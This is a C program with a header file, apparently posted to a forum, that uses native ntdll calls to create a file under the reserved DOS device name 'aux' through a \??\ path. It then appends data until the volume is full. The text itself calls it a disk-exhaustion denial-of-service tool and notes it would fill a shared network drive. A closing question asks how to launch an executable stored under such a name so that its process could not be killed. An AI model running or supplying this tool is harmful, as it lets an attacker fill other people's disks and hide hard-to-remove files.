#include <windows.h>
#include <io.h>
#include <stdio.h>
#include <stdlib.h>
#include "ngl.h"
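/*
 * Native-API constants that windows.h does not expose (values as in the DDK
 * headers).  The original listing defined FILE_SYNCHRONOUS_IO_NONALERT twice;
 * the duplicate is dropped here.
 */

/* CreateDisposition for ZwCreateFile: open the file, create it if absent. */
#define FILE_OPEN_IF 0x00000003

/* OBJECT_ATTRIBUTES.Attributes flag (kernel-mode only handles). */
#define OBJ_KERNEL_HANDLE 0x00000200L

/*
 * CreateOptions for ZwCreateFile.  Per the NtCreateFile documentation a handle
 * opened without one of the FILE_SYNCHRONOUS_IO_* flags is asynchronous, so
 * Win32 WriteFile on it must be driven with an OVERLAPPED + wait.
 */
#define FILE_DIRECTORY_FILE 0x00000001
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SEQUENTIAL_ONLY 0x00000004
#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_FOR_RECOVERY 0x00000400
#define FILE_RANDOM_ACCESS 0x00000800
#define FILE_DELETE_ON_CLOSE 0x00001000
#define FILE_OPEN_BY_FILE_ID 0x00002000
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000

/* Combinations of the above used by structured storage. */
#define FILE_COPY_STRUCTURED_STORAGE 0x00000041
#define FILE_STRUCTURED_STORAGE 0x00000441

/* Masks of the option bits that are valid for each object class. */
#define FILE_VALID_OPTION_FLAGS 0x00ffffff
#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032
#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032
#define FILE_VALID_SET_FLAGS 0x00000036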
/*
 * ntdll.dll entry points that are not in any import library.  They are
 * resolved at run time with GetProcAddress by LocateNTDLLEntryPoints() and
 * are NULL until that function has been called.
 */
typedef NTSTATUS (__stdcall *ZwWriteFile_t)(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PVOID ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PVOID Buffer,
    IN ULONG Length,
    IN PLARGE_INTEGER ByteOffset OPTIONAL,
    IN PULONG Key OPTIONAL
);
typedef NTSTATUS (__stdcall *ZwDeleteFile_t)(
    IN POBJECT_ATTRIBUTES ObjectAttributes
);
typedef NTSTATUS (__stdcall *ZwClose_t)(
    IN HANDLE hd
);

ZwWriteFile_t ZwWriteFile;
ZwDeleteFile_t ZwDeleteFile;
ZwClose_t ZwClose;
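/*
 * Payload buffer appended to the target file by main(): 358400 bytes, first
 * byte 0xFF, the remainder zero-filled by the partial initializer.
 * The original wrote {0xFFFFFF}, which does not fit in a char and relied on
 * the compiler silently truncating it to 0xFF; the cast makes that explicit.
 */
char a[512*700] = { (char)0xFF };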
/* Byte count filled in by WriteFile in main(). */
DWORD ile = 0;
/* Declared next to `ile` but not referenced anywhere in this listing. */
DWORD il = 0;
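/*
 * Resolve one ntdll.dll export by name, or terminate the process.
 *
 * ntdll.dll is mapped into every user-mode process, so GetModuleHandle is
 * sufficient (no LoadLibrary).  `name` is echoed in the error message so a
 * failure names the symbol that is actually missing -- the original printed
 * unrelated Nt*Key names and lacked the newline.
 */
static FARPROC ResolveNtdllExport(const char *name)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    FARPROC fn = ntdll ? GetProcAddress(ntdll, name) : NULL;

    if (fn == NULL) {
        printf("Could not find %s entry point in NTDLL.DLL\n", name);
        exit(1);
    }
    return fn;
}

/*
 * Loads and finds the entry points we need in NTDLL.DLL: fills in the
 * ZwClose / ZwDeleteFile / ZwWriteFile / ZwCreateFile function pointers.
 * Exits the process with status 1 if any of them cannot be resolved.
 */
VOID LocateNTDLLEntryPoints(void)
{
    ZwClose      = (void *) ResolveNtdllExport("ZwClose");
    ZwDeleteFile = (void *) ResolveNtdllExport("ZwDeleteFile");
    ZwWriteFile  = (void *) ResolveNtdllExport("ZwWriteFile");
    ZwCreateFile = (void *) ResolveNtdllExport("ZwCreateFile");
}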
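/*
 * Demonstrator: creates C:\aux.cxxxap through the NT-native path
 * "\??\c:\aux.cxxxap" and appends to it until the write fails (normally
 * because the volume is full).
 *
 * "AUX" is a legacy DOS device name, so the Win32 path layer refuses to
 * create or open a file called aux.<anything>.  Passing the native "\??\"
 * path straight to ZwCreateFile skips that Win32 check.  This is only a
 * naming trick: the create still goes through the normal ACL check on the
 * target directory, and the same native path removes the file again
 * (ZwDeleteFile below does exactly that for a leftover copy).
 *
 * Filling a volume is a denial of service; only run this against systems
 * you are authorised to test.
 *
 * Returns 0 when the loop stopped on ERROR_DISK_FULL, 1 on any other error.
 */
int main(void)
{
    HANDLE ph = NULL;
    IO_STATUS_BLOCK iosb = {0};
    UNICODE_STRING KeyName;
    OBJECT_ATTRIBUTES ObjectAttributes;
    /* NT object-manager path; "\??\" is the per-session DOS device prefix.
     * Kept non-const because UNICODE_STRING.Buffer is a PWSTR. */
    static WCHAR path[] = L"\\??\\c:\\aux.cxxxap";
    LONG status;
    DWORD written = 0;
    DWORD blocks = 0;
    DWORD err = ERROR_SUCCESS;

    LocateNTDLLEntryPoints();

    /* UNICODE_STRING is counted, not NUL-terminated: Length is in bytes and
     * excludes the terminator, MaximumLength includes it.  The original left
     * MaximumLength uninitialised. */
    KeyName.Buffer = path;
    KeyName.Length = (USHORT)(sizeof(path) - sizeof(WCHAR));
    KeyName.MaximumLength = (USHORT)sizeof(path);
    InitializeObjectAttributes(&ObjectAttributes, &KeyName,
                               OBJ_CASE_INSENSITIVE, NULL, NULL);

    /* Remove a leftover copy from a previous run; a missing file is fine. */
    ZwDeleteFile(&ObjectAttributes);
    getchar();

    /*
     * Open a synchronous handle (SYNCHRONIZE + FILE_SYNCHRONOUS_IO_NONALERT)
     * so that WriteFile below completes inline.  The original opened an
     * asynchronous handle and then issued overlapped writes without ever
     * waiting for them.
     *
     * NTSTATUS is signed: negative values are errors.  ngl.h declares it as
     * ULONG, which makes NT_SUCCESS() always true, hence the explicit cast.
     */
    status = (LONG)ZwCreateFile(&ph, FILE_APPEND_DATA | SYNCHRONIZE,
                                &ObjectAttributes, &iosb, NULL,
                                FILE_ATTRIBUTE_NORMAL, 0, FILE_OPEN_IF,
                                FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
                                NULL, 0);
    if (status < 0) {
        /* GetLastError() is meaningless after a native call; the original
         * printed it anyway.  Report the NTSTATUS instead. */
        printf("ZwCreateFile failed: NTSTATUS 0x%08lX\n", (unsigned long)status);
        return 1;
    }
    printf("created, disposition %lu\n", (unsigned long)iosb.Information);
    getchar();

    /* Append the buffer until WriteFile fails; the original looped forever
     * and never reached ZwClose. */
    for (;;) {
        if (!WriteFile(ph, a, sizeof(a), &written, NULL)) {
            err = GetLastError();
            break;
        }
        blocks++;
        printf("%lu\n", (unsigned long)written);
    }
    printf("stopped after %lu blocks of %lu bytes, error %lu\n",
           (unsigned long)blocks, (unsigned long)sizeof(a), (unsigned long)err);

    status = (LONG)ZwClose(ph);
    if (status < 0) {
        printf("ZwClose failed: NTSTATUS 0x%08lX\n", (unsigned long)status);
    }
    return err == ERROR_DISK_FULL ? 0 : 1;
}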
// ngl.h
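/* OBJECT_ATTRIBUTES.Attributes flag: match the object name case-insensitively. */
#define OBJ_CASE_INSENSITIVE 0x40

/* Native-API integer types expressed in Win32 terms (windows.h must already
 * be included). */
typedef DWORD ULONG;
typedef WORD USHORT;

/*
 * NTSTATUS is a *signed* 32-bit value: success and informational codes are
 * >= 0, warnings and errors have the top bit set (0x8xxxxxxx / 0xCxxxxxxx).
 * The original declared it as ULONG, so NT_SUCCESS() compared an unsigned
 * value with 0 and was always true -- every failing native call looked like
 * a success.
 */
typedef LONG NTSTATUS;
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)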
/* Counted wide string used for native object names: Length and
 * MaximumLength are byte counts (excluding / including the terminator);
 * Buffer need not be NUL-terminated. */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
/* Describes the object a native call should open or create; normally filled
 * in with the InitializeObjectAttributes() macro below. */
typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;                    /* sizeof(OBJECT_ATTRIBUTES) */
    HANDLE RootDirectory;            /* base for a relative ObjectName, or NULL */
    PUNICODE_STRING ObjectName;
    ULONG Attributes;                /* OBJ_* flags */
    PVOID SecurityDescriptor;        /* Points to type SECURITY_DESCRIPTOR */
    PVOID SecurityQualityOfService;  /* Points to type SECURITY_QUALITY_OF_SERVICE */
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
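/*
 * Fill in an OBJECT_ATTRIBUTES for a native call.
 *   p - OBJECT_ATTRIBUTES * to initialise
 *   n - PUNICODE_STRING object name
 *   a - OBJ_* attribute flags
 *   r - root directory handle (NULL for an absolute name)
 *   s - security descriptor (may be NULL)
 * SecurityQualityOfService is always cleared.  The original macro had lost
 * its line-continuation backslashes, leaving loose statements at file scope;
 * it is also wrapped in do/while(0) so it is safe as a single statement.
 */
#define InitializeObjectAttributes( p, n, a, r, s ) \
    do { \
        (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
        (p)->RootDirectory = (r); \
        (p)->Attributes = (a); \
        (p)->ObjectName = (n); \
        (p)->SecurityDescriptor = (s); \
        (p)->SecurityQualityOfService = NULL; \
    } while (0)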
/* Completion record written by native I/O calls (ZwCreateFile here):
 * Status is the final NTSTATUS, Information a call-specific value (for a
 * create, the disposition per the NtCreateFile documentation). */
typedef struct _IO_STATUS_BLOCK {
    union {
        NTSTATUS Status;
        PVOID Pointer;
    };
    ULONG Information;
} IO_STATUS_BLOCK;
typedef IO_STATUS_BLOCK *PIO_STATUS_BLOCK;
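/*
 * NtCreateKey: creates or opens a registry key.
 *
 * The first parameter receives the new handle, so it must be a PHANDLE as in
 * the documented prototype.  The original declared it as a plain HANDLE,
 * which would make a caller pass a handle value where the kernel expects an
 * address to store the result.  Not resolved by LocateNTDLLEntryPoints in
 * this program, so it remains NULL.
 */
NTSTATUS (__stdcall *NtCreateKey)(
PHANDLE KeyHandle,
ULONG DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition
);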
/* NtSetValueKey: writes a value into an open registry key.  Not resolved by
 * LocateNTDLLEntryPoints in this program, so the pointer remains NULL. */
NTSTATUS (__stdcall *NtSetValueKey)(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName,
IN ULONG TitleIndex, /* optional */
IN ULONG Type,
IN PVOID Data,
IN ULONG DataSize
);
/* NtDeleteKey: deletes an open registry key.  Also never resolved here. */
NTSTATUS (__stdcall *NtDeleteKey)(
HANDLE KeyHandle
);
/*
 * ZwCreateFile: native create/open.  Resolved from ntdll.dll by
 * LocateNTDLLEntryPoints and used by main() to open the "\??\" path that
 * the Win32 layer rejects.  CreateDisposition takes FILE_OPEN_IF etc.,
 * CreateOptions the FILE_* option flags; IoStatusBlock receives the
 * disposition in Information.
 */
NTSTATUS (__stdcall*ZwCreateFile)(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);
/* ZwCreateDirectoryObject: creates an object-manager directory.  Not
 * resolved by LocateNTDLLEntryPoints in this program, so it remains NULL. */
NTSTATUS(__stdcall* ZwCreateDirectoryObject)(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
// Each run creates a new file on the volume named aux.cxxxap. A file with that name cannot be created through the ordinary Win32 path APIs, because "AUX" is a reserved DOS device name; the program gets around that by handing the NT-native path `\??\c:\aux.cxxxap` directly to ZwCreateFile. Note that this is only a naming trick: it does not bypass NTFS permissions, so the user still needs write access to the target directory, and the same native path (as used with ZwDeleteFile above) removes the file again. The write loop then appends to the file until the disk is full, i.e. this is a disk-exhaustion denial-of-service tool; pointing it at a shared network drive would fill that share in the same way. Do not run it against systems you are not authorised to test.
And now a question: if I copied the contents of some executable, e.g. notepad.exe, into such a file (plain notepad.exe, just under the name AUX.NOTEPAD.EXE), how could that file be launched? ZwCreateProcess? And then what? It is a bit involved, and I assume such a process could not be terminated either, because of the "aux" name — though nothing in the listing supports that: process termination (TerminateProcess, Task Manager) works on a process handle or PID, not on the image path, so a reserved file name would not protect the process. Can anyone help?